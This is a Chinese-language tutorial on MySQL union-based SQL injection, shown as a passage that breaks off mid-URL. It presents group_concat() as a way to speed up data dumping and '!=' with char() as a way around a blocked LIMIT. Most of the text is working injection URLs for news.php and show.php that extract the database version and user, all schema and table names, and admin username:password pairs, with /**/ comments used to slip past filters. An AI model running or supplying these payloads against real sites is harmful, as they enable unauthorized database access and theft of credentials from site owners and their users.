我们在暴库表中使用到limit功能语句来强制返回select查询的记录数.doc

我们在暴库表中使用到limit功能语句来强制返回select查询的记录数。如果在渗透中limit功能语句无法使用，是不是很难进行遍历了？如果被限制的话，可以使用“!=”来绕过。语句使用格式：show.php?id=2 and 1=2 union select 1,table_name,3 from information_schema.tables where table_schema=database() and table_name !=char(97,100,109,105,110)-- 　　虽然这样能够绕过limit的限制，但是利用起来非常不方便，而且猜解的速度很慢。经过我的仔细研究，找到了一个相对比较好的方法。而且解决了limit被限制的问题，更重要的是加速了遍历的速度，明显提高注射的效率。 　　group_concat()函数介绍 　　首先我们来了解一下group_concat()函数，该函数完整语法如下： 　　GROUP_CONCAT( [DISTINCT] expr [,expr ...] [ORDER BY {unsigned_integer | col_name | formula} [ASC | DESC] [,col ...]] 　　 [SEPARATOR str_val] ) 　　该函数返回一个字符串结果，该结果由分组中的值连接组合而成，这个函数在 MySQL 4.1 中被加入。有兴趣的朋友可以参考“MYSQL5.1参考手册” 。 　　普通利用 　　该函数在MYSQL的注射中也有使用的例子，利用方法还只是局限于在一个地方显示一些普通信息，比如显示数据库版本和爆字段数据等。 爆版本等信息，执行语句： 　　news.php?category=seminar amp;id=-291/**/union/**/select/** /1,group_concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15 —　 爆用户名以及密码等字段信息，执行语句： 　　news.php?id=-1/**/union/**/select/**/1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12/**/from/**/admin— 　　这么强悍的函数，我们为什么不深度挖掘它的功能呢？利用它可以干一些不可思议的事，接下来我会介绍如何深度利用这个函数，读者朋友可要仔细了。 高级利用 爆全部库名 　　news.php?category=seminarid=-291/**/union/**/select/**/1,group_concat(SCHEMA_NAME),3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/information_schema.SCHEMATA-- 　　爆出了所有的数据库名，共有三个。依次为： information_schema cite test 爆全部表名 　　利用这个函数可以爆出全部的表名，如果想爆出cite库的全部表名。构造查询语句： 　　news.php?category=seminarid=-291/**/union/**/select/**/1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/information_schema.tables/**/where/**/table_schema=0其中0cite的HEX值。 　　如果只是想爆当前库的全部表名，我们不需要将库名进行HEX值转换。可以这样执行语句： 　　news.php?category=seminarid=-291/**/union/**/select/**/1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15/** /from/**/information_schema.tables/**/where/** /table_schema=database()-- 其中database()函数就是显示当前库的信息。 爆全部字段名 　　利用这个函数可以爆出全部的字段名，如果想爆出“account”表的全部字段，首先将其进行HEX转换。构造查询语句： 　　news.php?category=s